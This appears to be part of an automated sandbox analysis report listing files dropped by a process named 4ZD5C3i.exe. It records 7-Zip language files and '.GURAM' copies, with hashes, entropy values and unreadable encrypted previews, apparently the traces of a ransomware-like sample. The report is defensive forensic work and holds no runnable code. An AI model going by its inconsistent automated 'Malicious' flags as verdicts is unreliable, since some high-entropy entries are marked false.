                                                                                                                                                                                                                                                Preview:./....|)ai.~..Im^W.?t].+...1~*.......K.4mwLm..Qt..w....$..d..=..$..&.5`3......#k.<.tF..ob....P....%..A.....~V..r.z.Z.0,.'.O.......t.X.j.....t....7..s.....G.y.."..A3.5.eS..}K.Z..f...cq........x|.~w...u..$R....oL....$..8...][XC./L'.5].^E..}.$._..;....9T.....R..A8..B\.. ......F.#*G..4..{.\........`..t..O_,.2Z......zD..SM#.........."9..V.L.W?N.H..B....I...hIW2....j.LYZ.g%>.......eo..a.]*!.....B[Q..9..prC...I.....~-.L..b..pj...5.V.V..D=.h..Rt@.....".....Wi....?m..V.n..r..7%.Wu....wF...l.d.M"H...'h...0..E.AC..{z....`./ymq._.+..V.P.$.Rf. ak. ..g..G$.x.B...p.e.<.n..rh=....}.Jv.^.....#; .......u...R..{..&#_.+.W...$...81^jkO>.-m.....:.7..v?H.9e.Y..P.......A.......2".}..Q.;:.......k.)U...X.Bj..,.....u..X...N...]....WI...B47V..ic...7...?...F|......]......v?/El..[.#......f...*..>..&(...l.M.m.........,U.|.3s.I..J-.Y:...m7..{h<.SL..`E...O..../Pk......9..|Y.....-.h......_.rx.x!h..*.......n.6.%..P.".....xw...V...S..TL[R....K.6.:R.+..T.....p.......`.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\lt.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10133
                                                                                                                                                                                                                                                Entropy (8bit):7.983150177690685
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:jtePG+llBbONy+7v7MBfEVoGaV5ev8GmCmxhnbUtfC26G3Ht3K75dvJ8UyPq:jt1oSNRTAmvuhbo626G3Ht38jBTJ
                                                                                                                                                                                                                                                MD5:F3860BA817DC862FDF4310B571EE2A7B
                                                                                                                                                                                                                                                SHA1:2370AB2D824E2E3D215FCB022F387C5DF4774502
                                                                                                                                                                                                                                                SHA-256:1C1CA0E6495E153623A7DD58E64C027ECBF14E586C8A5562930B4A06E435EEA9
                                                                                                                                                                                                                                                SHA-512:A8005BE14FBA46FBD283792542FB69DB494FF2C8437CC257865EBA11A93773004F8BCCD371B34F36AB28A6F2D12F64C5BF6E4AB50ECF482968394499CBB3CC90
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:./....|)ai.~..Im^W.?t].+...1~*.......K.4mwLm..Qt..w....$..d..=..$..&.5`3......#k.<.tF..ob....P....%..A.....~V..r.z.Z.0,.'.O.......t.X.j.....t....7..s.....G.y.."..A3.5.eS..}K.Z..f...cq........x|.~w...u..$R....oL....$..8...][XC./L'.5].^E..}.$._..;....9T.....R..A8..B\.. ......F.#*G..4..{.\........`..t..O_,.2Z......zD..SM#.........."9..V.L.W?N.H..B....I...hIW2....j.LYZ.g%>.......eo..a.]*!.....B[Q..9..prC...I.....~-.L..b..pj...5.V.V..D=.h..Rt@.....".....Wi....?m..V.n..r..7%.Wu....wF...l.d.M"H...'h...0..E.AC..{z....`./ymq._.+..V.P.$.Rf. ak. ..g..G$.x.B...p.e.<.n..rh=....}.Jv.^.....#; .......u...R..{..&#_.+.W...$...81^jkO>.-m.....:.7..v?H.9e.Y..P.......A.......2".}..Q.;:.......k.)U...X.Bj..,.....u..X...N...]....WI...B47V..ic...7...?...F|......]......v?/El..[.#......f...*..>..&(...l.M.m.........,U.|.3s.I..J-.Y:...m7..{h<.SL..`E...O..../Pk......9..|Y.....-.h......_.rx.x!h..*.......n.6.%..P.".....xw...V...S..TL[R....K.6.:R.+..T.....p.......`.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\lv.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):6028
                                                                                                                                                                                                                                                Entropy (8bit):7.966660946968934
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:LQ1PXB+juBYy8AK6YFp2P4T22a153pr4iREopbzaSKtmu2xt9Hpleu:LQ1PIjuK0Wp2AC2aXJ4cEoYSHpUu
                                                                                                                                                                                                                                                MD5:C3DD4AB7D709D2FFE13199F732336CD7
                                                                                                                                                                                                                                                SHA1:7BED51EA76CB0CE4A5F501DB49C1AE3482F390C9
                                                                                                                                                                                                                                                SHA-256:E305AD5D1870B9A6170BC0A54884C738571B4F6D9AF212E23D7B92C732488160
                                                                                                                                                                                                                                                SHA-512:A5558D52BC75052CB2599E65DB98CED181B62F8ABA0DBB530E63258F4654C855380509E4E4FF83783D50FD68A8BDAE25514EC107B84E4FEC3825E62B3D03AA58
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.B(.....Lfu*.2Y3V..t..{..G.d...@U.."..t_..ep..d<.......3<.\..^.x.l.q....;..X.1cn..*...axw.....q........7O...6O`..}p...f......9Lp...".a....,j..(....I..%...]f#.f..@.tA.b#8..,...R.S.q..#F.uI'.....\[^.|..>5P.....up|?./.-..G..:.......F..@.B>-....j.e&.$.1..EkE;.i:"c.U<....\.S[2...w....!%......N..._c_.].._z...s#f..K...u.....oW.g..!Y)......~.O.n.....w...=tK..L?.nS....r+.#.U...0.R..y|....o.....m...3A.:^.*.(.QY....?.....?...T...'|_N..:.y..*}e.i7..p.L...Aa.......S.TZ..j..........E..k...iof...0..V.=.=.....B.c7?.dZ...H...m......7....N...Z-vU_....C0;...Z..Zo..........U.|.l.c... r.......c....U.......S.....oP...R..}.@....0._...7..O.^..R..%.@:,..s..J..F...E...un..J@..a....I.=$..y..;&...(.h..:.2...I...b..j,.-...D..r.YF.J........MJU....').8.bO.aX1......H.s...(D.ao....h..Y......m..}ytm]..B......*.....H...8F.....K..6.2.}.(.2..c....mT..wM......^......-...D..gVO..A...3j(6.FB."..,Y..=...~..h8..m:.s..K...&'m....u)..b#".."/._.J...(XL..@...u.+Pr.-.nv..@2<.6..R.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\lv.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):6028
                                                                                                                                                                                                                                                Entropy (8bit):7.966660946968934
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:LQ1PXB+juBYy8AK6YFp2P4T22a153pr4iREopbzaSKtmu2xt9Hpleu:LQ1PIjuK0Wp2AC2aXJ4cEoYSHpUu
                                                                                                                                                                                                                                                MD5:C3DD4AB7D709D2FFE13199F732336CD7
                                                                                                                                                                                                                                                SHA1:7BED51EA76CB0CE4A5F501DB49C1AE3482F390C9
                                                                                                                                                                                                                                                SHA-256:E305AD5D1870B9A6170BC0A54884C738571B4F6D9AF212E23D7B92C732488160
                                                                                                                                                                                                                                                SHA-512:A5558D52BC75052CB2599E65DB98CED181B62F8ABA0DBB530E63258F4654C855380509E4E4FF83783D50FD68A8BDAE25514EC107B84E4FEC3825E62B3D03AA58
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.B(.....Lfu*.2Y3V..t..{..G.d...@U.."..t_..ep..d<.......3<.\..^.x.l.q....;..X.1cn..*...axw.....q........7O...6O`..}p...f......9Lp...".a....,j..(....I..%...]f#.f..@.tA.b#8..,...R.S.q..#F.uI'.....\[^.|..>5P.....up|?./.-..G..:.......F..@.B>-....j.e&.$.1..EkE;.i:"c.U<....\.S[2...w....!%......N..._c_.].._z...s#f..K...u.....oW.g..!Y)......~.O.n.....w...=tK..L?.nS....r+.#.U...0.R..y|....o.....m...3A.:^.*.(.QY....?.....?...T...'|_N..:.y..*}e.i7..p.L...Aa.......S.TZ..j..........E..k...iof...0..V.=.=.....B.c7?.dZ...H...m......7....N...Z-vU_....C0;...Z..Zo..........U.|.l.c... r.......c....U.......S.....oP...R..}.@....0._...7..O.^..R..%.@:,..s..J..F...E...un..J@..a....I.=$..y..;&...(.h..:.2...I...b..j,.-...D..r.YF.J........MJU....').8.bO.aX1......H.s...(D.ao....h..Y......m..}ytm]..B......*.....H...8F.....K..6.2.}.(.2..c....mT..wM......^......-...D..gVO..A...3j(6.FB."..,Y..=...~..h8..m:.s..K...&'m....u)..b#".."/._.J...(XL..@...u.+Pr.-.nv..@2<.6..R.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\mk.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9364
                                                                                                                                                                                                                                                Entropy (8bit):7.9819890740002215
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:q3dMl0WN7emiIMZqKbCA7gAQuuh4KyNl9cRvDIQbjc9Uw/QvFUC:q3ilx9emiHt2IrJ4xWqKQyC
                                                                                                                                                                                                                                                MD5:7CBAA1FD4D1D04F9DBB8E95FA335EA3F
                                                                                                                                                                                                                                                SHA1:CCA3A1B2D57A2A9784859078846F73FE79C417BC
                                                                                                                                                                                                                                                SHA-256:871102DA37F1FAF4D575247855C7E7B712CDADF7BDF2CDE1DEF268767375BF7E
                                                                                                                                                                                                                                                SHA-512:3848B366856B0B765CBAB2EEBE32D5BFF4841EB00757FBD77C05376B06C47DF7D2793FC835AD78D5DA58FF57FDB18E497E7455C97A2B0FE01E76D19558FDC4EF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..Z.}"..i.%.d.]$.j..CF..z.+1+.\.3.{..w.C3.....L.+...6*...`7..Ove...{b.Q`.\io.T......._S:.O.y....v.f...G%%....d.>...I...U+.....Wb..)...9...l.....vh....."`..M.w...M.p..........BB...U_...+...&0"IL7.....t....$. .A.'.~Y.....U ...y.._*.7..`...Z....a..q.\.....>..U.&..<O...nU....{M..S..VL.....XP..* N..C...I......&jT.F.N|-+&m^.k;...%w.SZ%..w#.{p=.n.'@h.f..x..n.V(.y...|!........bo.+/..3tp....zQS......#...j.o.L.j......\...g..k.=y....le.`q.f..q.oO(..}....zVL%..U_..a...G:.GfE..tx..Y.1.VtxN...*R...;Q.%pyt.....r.G..BZC...).....a.F..sm....7......n.Df..|....4.@.......I..).wd%...,...`....]I........F.H...P.....,...b{...i....o......4....G....~..y$....f{.r.C.,..,.....,...5T....]...v.b.P.y.LKt...c.W...zvm.N.>..X..h.t?C..R.A%c.i.@rqj..?.V.n...s.$.....k.G...C......%q:.....'...x..9o.-+V..*O....,G}...].....P.....?."_.L.Xm....m|.....~...5a..U.I...w.rT.+,...G.#.J...q?...-h,...d..nf.../P.].......~......%[6yQ. ..s....!...F...X.....>z.#.....G&.P......w.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\mk.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9364
                                                                                                                                                                                                                                                Entropy (8bit):7.9819890740002215
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:q3dMl0WN7emiIMZqKbCA7gAQuuh4KyNl9cRvDIQbjc9Uw/QvFUC:q3ilx9emiHt2IrJ4xWqKQyC
                                                                                                                                                                                                                                                MD5:7CBAA1FD4D1D04F9DBB8E95FA335EA3F
                                                                                                                                                                                                                                                SHA1:CCA3A1B2D57A2A9784859078846F73FE79C417BC
                                                                                                                                                                                                                                                SHA-256:871102DA37F1FAF4D575247855C7E7B712CDADF7BDF2CDE1DEF268767375BF7E
                                                                                                                                                                                                                                                SHA-512:3848B366856B0B765CBAB2EEBE32D5BFF4841EB00757FBD77C05376B06C47DF7D2793FC835AD78D5DA58FF57FDB18E497E7455C97A2B0FE01E76D19558FDC4EF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..Z.}"..i.%.d.]$.j..CF..z.+1+.\.3.{..w.C3.....L.+...6*...`7..Ove...{b.Q`.\io.T......._S:.O.y....v.f...G%%....d.>...I...U+.....Wb..)...9...l.....vh....."`..M.w...M.p..........BB...U_...+...&0"IL7.....t....$. .A.'.~Y.....U ...y.._*.7..`...Z....a..q.\.....>..U.&..<O...nU....{M..S..VL.....XP..* N..C...I......&jT.F.N|-+&m^.k;...%w.SZ%..w#.{p=.n.'@h.f..x..n.V(.y...|!........bo.+/..3tp....zQS......#...j.o.L.j......\...g..k.=y....le.`q.f..q.oO(..}....zVL%..U_..a...G:.GfE..tx..Y.1.VtxN...*R...;Q.%pyt.....r.G..BZC...).....a.F..sm....7......n.Df..|....4.@.......I..).wd%...,...`....]I........F.H...P.....,...b{...i....o......4....G....~..y$....f{.r.C.,..,.....,...5T....]...v.b.P.y.LKt...c.W...zvm.N.>..X..h.t?C..R.A%c.i.@rqj..?.V.n...s.$.....k.G...C......%q:.....'...x..9o.-+V..*O....,G}...].....P.....?."_.L.Xm....m|.....~...5a..U.I...w.rT.+,...G.#.J...q?...-h,...d..nf.../P.].......~......%[6yQ. ..s....!...F...X.....>z.#.....G&.P......w.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\mn.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9081
                                                                                                                                                                                                                                                Entropy (8bit):7.9797412737793065
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:1nwU7nLSTFEj6Z25xKTM/bkZ70K0XI1+5yio/62U3:LyTy+A5xK49dX6Aygd3
                                                                                                                                                                                                                                                MD5:BF05F23E69AC2CD736EAE8A493992451
                                                                                                                                                                                                                                                SHA1:FA4D12CFF99546C07F2B3C4AC4C39B369AC8E457
                                                                                                                                                                                                                                                SHA-256:D5097024FCDA1A5182377F66074CE10360AD2F0C4DA4FAECE64B2DF5D4B40622
                                                                                                                                                                                                                                                SHA-512:6DC2F14970838FF793627DE38B8035717E5D88C76D38E85909CDEA2431906FF0D73AB974906F18CB51374B5E92CCD941483A65E1306421B2F890C1CFFD912173
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.d.it..jF...vU..R.la.D..1>......=C..C;..!...1..e..n."....T..`h../. ..H.r....CM..d....`...P..<<.O....x.Fi,..Qt8..z.t....B.._0.......=.....*.bl.r.y.@)P......Y..,.a.&?.sc`.hT.q....;p..l%....X.R0hI"4...L.+.S.j...S....:...Q.TE.h.Hg.GP.....*1Cu.......V....F.C...M[.d.D.w.C...(..)..9.........bJ..>..%-.JE@.R....Fi.y..x.1|.wb ...(.s...+_.n>FF.,...J@...&~..55...i..g...?.hl...d..'.Tf2....^....PX1.kJN.[u.....).......t)....IvF4....z#...M.P0Wi.u.i..]..e..}(..Rt..p.U..uL...*...M.Q.-{.........U..m.!}../.:}.o....L..Cm.Kb...j...H'0.M.'9.....n.....r.2.!..;.#\>.._.H.q,.1.s....5.:.UB.S...}S.rj.....%..HW6..dj...)..zM*..o...7..55..G..9/..I0.?.A....rO"..1.4..u.'.m.L..n....f.c...J......@..t.S..?...L..+#..fRE.4$.....#Iu(..'.=..{.....E:KX..#.]...,2..-...o.s.I..(]....T..u.. ..;!...wZ...V..I[F~..m.d}R.5..g.....c.....(.X.....=Gf.Z..x.?0'5z.-.5....AHu.O..e.AG.:..'....*7...G).t.rZT...:..._<....u.{.%.f3.E+..s.I.........-.0.3...p..w..v?.';....%(gB..@.K.U..m.jWW8..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\mn.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9081
                                                                                                                                                                                                                                                Entropy (8bit):7.9797412737793065
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:1nwU7nLSTFEj6Z25xKTM/bkZ70K0XI1+5yio/62U3:LyTy+A5xK49dX6Aygd3
                                                                                                                                                                                                                                                MD5:BF05F23E69AC2CD736EAE8A493992451
                                                                                                                                                                                                                                                SHA1:FA4D12CFF99546C07F2B3C4AC4C39B369AC8E457
                                                                                                                                                                                                                                                SHA-256:D5097024FCDA1A5182377F66074CE10360AD2F0C4DA4FAECE64B2DF5D4B40622
                                                                                                                                                                                                                                                SHA-512:6DC2F14970838FF793627DE38B8035717E5D88C76D38E85909CDEA2431906FF0D73AB974906F18CB51374B5E92CCD941483A65E1306421B2F890C1CFFD912173
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.d.it..jF...vU..R.la.D..1>......=C..C;..!...1..e..n."....T..`h../. ..H.r....CM..d....`...P..<<.O....x.Fi,..Qt8..z.t....B.._0.......=.....*.bl.r.y.@)P......Y..,.a.&?.sc`.hT.q....;p..l%....X.R0hI"4...L.+.S.j...S....:...Q.TE.h.Hg.GP.....*1Cu.......V....F.C...M[.d.D.w.C...(..)..9.........bJ..>..%-.JE@.R....Fi.y..x.1|.wb ...(.s...+_.n>FF.,...J@...&~..55...i..g...?.hl...d..'.Tf2....^....PX1.kJN.[u.....).......t)....IvF4....z#...M.P0Wi.u.i..]..e..}(..Rt..p.U..uL...*...M.Q.-{.........U..m.!}../.:}.o....L..Cm.Kb...j...H'0.M.'9.....n.....r.2.!..;.#\>.._.H.q,.1.s....5.:.UB.S...}S.rj.....%..HW6..dj...)..zM*..o...7..55..G..9/..I0.?.A....rO"..1.4..u.'.m.L..n....f.c...J......@..t.S..?...L..+#..fRE.4$.....#Iu(..'.=..{.....E:KX..#.]...,2..-...o.s.I..(]....T..u.. ..;!...wZ...V..I[F~..m.d}R.5..g.....c.....(.X.....=Gf.Z..x.?0'5z.-.5....AHu.O..e.AG.:..'....*7...G).t.rZT...:..._<....u.{.%.f3.E+..s.I.........-.0.3...p..w..v?.';....%(gB..@.K.U..m.jWW8..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\mng.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20798
                                                                                                                                                                                                                                                Entropy (8bit):7.9910988789743405
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:mzprh79M9qx5wnpt5UZn8P9RTuuU8a+T0ULOEmnouRTJ:gZRKcKUyP9duLr+T0NvoutJ
                                                                                                                                                                                                                                                MD5:5D731724CA5E27568A10A17E8A6CC156
                                                                                                                                                                                                                                                SHA1:E6F95887D72C593D4B9391C55B128A2BCE0A901A
                                                                                                                                                                                                                                                SHA-256:A91D6DCF0FF431C06EB48672224ACE5C0CCA85207172D4A57760540629E0C663
                                                                                                                                                                                                                                                SHA-512:1031EA61C33A69F564741EF4C9FFFCDA8D72F1FC8EE46DA14F68F594DA0BB4BB3197485AE5DC1C5ACC2571CF64076412978006B5E60740B6FAF1726BFD10E014
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.*...,....CN......b.nF.K...v.X....N!F.8....Z.<..i&.~.M%?...7..|F.z...9.2....<6 m^.B...2.xp........WJ=G......MP..\'..dE.....2..Qi...l....pi]5e:.[:?z.=f..8yw.?.m.N..H....c...$.....H%Z.....o?u>e. wk2.......;h...T..-n.esLg....s}.H.r...#5#s......x..V.k.......~.p.j.{vY.5./q...J.9...Y..7..m...Gv.../....s.../@'.rm.D`.T ..@.0........w.N..j....{........1.,..!.sXC......:.<....nU...-..].......(.%.<.U4.E.j:E.%*.........boz........8.8..Z9......>.......MC.m"P..Q@.s......?.[Y.I.A%B.\..:...U.$.u..*..8...g3...S.b'...<..]4.oF. ...3.q.].....c...J.R.....K........x'."G..~....V.3}_.L.T8.k;.;.8.z.fW9..D..kezRJ.........E........-Tr.(]...i<.p.xA_..X6..k.. Fh5Z...(.6R5#w..l.Z.O(47.....0.0.A..{./.gj..a?..e.:[...m=..V|.c....t..t.!$H..H3.../.G.W-.N(D4{.B$...i.{>...+/...'......h9$..O.k.-..5H.:.U..G%RC...|1S.).R.[.M.W.a.%......t..3.]......./..}ll.K....,..B'....e_,.......>.d...(..w../.&B=.#Ir.B.z~.^i]...S+..h...k.T.]d....G..........4...2.oQ.&c..D..4X....a.r`.S...}..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\mng.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20798
                                                                                                                                                                                                                                                Entropy (8bit):7.9910988789743405
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:mzprh79M9qx5wnpt5UZn8P9RTuuU8a+T0ULOEmnouRTJ:gZRKcKUyP9duLr+T0NvoutJ
                                                                                                                                                                                                                                                MD5:5D731724CA5E27568A10A17E8A6CC156
                                                                                                                                                                                                                                                SHA1:E6F95887D72C593D4B9391C55B128A2BCE0A901A
                                                                                                                                                                                                                                                SHA-256:A91D6DCF0FF431C06EB48672224ACE5C0CCA85207172D4A57760540629E0C663
                                                                                                                                                                                                                                                SHA-512:1031EA61C33A69F564741EF4C9FFFCDA8D72F1FC8EE46DA14F68F594DA0BB4BB3197485AE5DC1C5ACC2571CF64076412978006B5E60740B6FAF1726BFD10E014
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.*...,....CN......b.nF.K...v.X....N!F.8....Z.<..i&.~.M%?...7..|F.z...9.2....<6 m^.B...2.xp........WJ=G......MP..\'..dE.....2..Qi...l....pi]5e:.[:?z.=f..8yw.?.m.N..H....c...$.....H%Z.....o?u>e. wk2.......;h...T..-n.esLg....s}.H.r...#5#s......x..V.k.......~.p.j.{vY.5./q...J.9...Y..7..m...Gv.../....s.../@'.rm.D`.T ..@.0........w.N..j....{........1.,..!.sXC......:.<....nU...-..].......(.%.<.U4.E.j:E.%*.........boz........8.8..Z9......>.......MC.m"P..Q@.s......?.[Y.I.A%B.\..:...U.$.u..*..8...g3...S.b'...<..]4.oF. ...3.q.].....c...J.R.....K........x'."G..~....V.3}_.L.T8.k;.;.8.z.fW9..D..kezRJ.........E........-Tr.(]...i<.p.xA_..X6..k.. Fh5Z...(.6R5#w..l.Z.O(47.....0.0.A..{./.gj..a?..e.:[...m=..V|.c....t..t.!$H..H3.../.G.W-.N(D4{.B$...i.{>...+/...'......h9$..O.k.-..5H.:.U..G%RC...|1S.).R.[.M.W.a.%......t..3.]......./..}ll.K....,..B'....e_,.......>.d...(..w../.&B=.#Ir.B.z~.^i]...S+..h...k.T.]d....G..........4...2.oQ.&c..D..4X....a.r`.S...}..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\mng2.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):22181
                                                                                                                                                                                                                                                Entropy (8bit):7.990711089779811
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:fbM76gqCJzUpSoP0yE/2nIoe+ZnEgUkKhkznwzcXvO0o1K:fWlqbgoPnn5lZECKaLsc/7KK
                                                                                                                                                                                                                                                MD5:72B270D25FDDA1889156362A612D8B24
                                                                                                                                                                                                                                                SHA1:1A50FBC4A65A3DD769F673B79E29875127EE2D1F
                                                                                                                                                                                                                                                SHA-256:EEBE7C38E86A75ADC7DEE80CB1E1DA66EB1E85E3845D99507391C5F55FE37F9F
                                                                                                                                                                                                                                                SHA-512:B1AEDE29EFE116337BA1091001AE20F3347EFB94C6085BCAA2D03969C4015CCFBCC2615D8078B2295A96ABC7B242D75A41D8DC62FE108A56C2A14AB23DA5DC0F
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.0..D_k%.......,....bwj.B(.6.jK#...9$....{......E.J..*w;?....Q7....L9| G..]I.....L.]....M.g.a....S.L.GCF....T6...........A.....]@BQ..9z.....*_..N.....a|.M.S.Y...sq.5.$....Oe.."x...:...E...*.T.M.......*.Q....".].E.=XI..1....F. .s.m..._...T.....[.."W...b.`..o ....THk0N.O........`.........P<.(;.bT{.p..}R.....>.1.m..V.........y..d.ce..o;.h'.._?.L~.9..u.1.G.>.. f..o..q..?R.D)..|.{.f.+Zj..?.P..;.4....F.^..9...*...I;H$.7cqWX.2..:.'>...\.....G..;G.f...........BO|. ...u....eV.f.....E....6.r.|;../...D....U..9....go....df+.."u..Y|_a..AU..^......7.......c7...H...-...:..5t........g......x..;..F.......)...b....WXu.......:.F.#.U....|..`.......,{...9..B......?.>..o....y.=Nd..r5....~....B..aO...*...=..Op...S.k.......5.(..ccl.$.U.Ye......0...`.h>`.p....$4....M....18.WIZ. .P....p...0F....7..u.....3Q|.{fcT.w..YE.4...(S.8...h.".TS1...BU..Hf.0.Y...3..o....ub..`..p....af.}..0R.._..q..D.%.(."\..S.(..n..z..z..-W...'.,C.l.>..Z.~xk..+..h....y.........Nb

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\mng2.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):22181
                                                                                                                                                                                                                                                Entropy (8bit):7.990711089779811
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:fbM76gqCJzUpSoP0yE/2nIoe+ZnEgUkKhkznwzcXvO0o1K:fWlqbgoPnn5lZECKaLsc/7KK
                                                                                                                                                                                                                                                MD5:72B270D25FDDA1889156362A612D8B24
                                                                                                                                                                                                                                                SHA1:1A50FBC4A65A3DD769F673B79E29875127EE2D1F
                                                                                                                                                                                                                                                SHA-256:EEBE7C38E86A75ADC7DEE80CB1E1DA66EB1E85E3845D99507391C5F55FE37F9F
                                                                                                                                                                                                                                                SHA-512:B1AEDE29EFE116337BA1091001AE20F3347EFB94C6085BCAA2D03969C4015CCFBCC2615D8078B2295A96ABC7B242D75A41D8DC62FE108A56C2A14AB23DA5DC0F
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
